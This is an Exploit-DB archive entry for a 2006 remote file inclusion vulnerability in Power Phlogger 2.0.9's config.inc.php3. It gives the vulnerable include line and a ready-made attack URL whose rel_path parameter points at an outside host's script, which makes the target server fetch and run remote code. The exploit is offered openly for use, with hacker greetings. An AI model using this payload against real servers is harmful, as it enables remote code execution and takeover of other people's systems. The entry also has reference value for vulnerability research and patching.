Power Phlogger <= 2.0.9 - config.inc.php3 File Include Vulnerability

2006-10-19T00:00:00
ID EDB-ID:2602
Type exploitdb
Reporter x_w0x
Modified 2006-10-19T00:00:00

Description

Power Phlogger <= 2.0.9 (config.inc.php3) File Include Vulnerability. CVE-2002-1885,CVE-2006-7106. Webapps exploit for php platform

                                        
                                            #################################
# Power Phlogger 2.0.9 -        #
#################################
#Class:     Remote|Local File Include Vulnerability
# Remote:    Yes
# Local:     No
# Type:      High
# Site:      http://www.comscripts.com/scripts/php.power-phlogger.211.html #
# Author:    x_w0x
# Contact:   x_w0x@hotmail.com
###################################
#Vuln Code
(config.inc.php3):
&lt;?php
include $rel_path."functions.php3";//nothing here
?&gt;

#
http://victim.com/[Power Phlogger 2.0.9]/config.inc.php3?rel_path=http://DarknesseScript.txt


#Gr££tz:makoki, azzcoder,xoron,osm@n
#Speciale gr££tz: str0ke, and elite-team

# milw0rm.com [2006-10-19]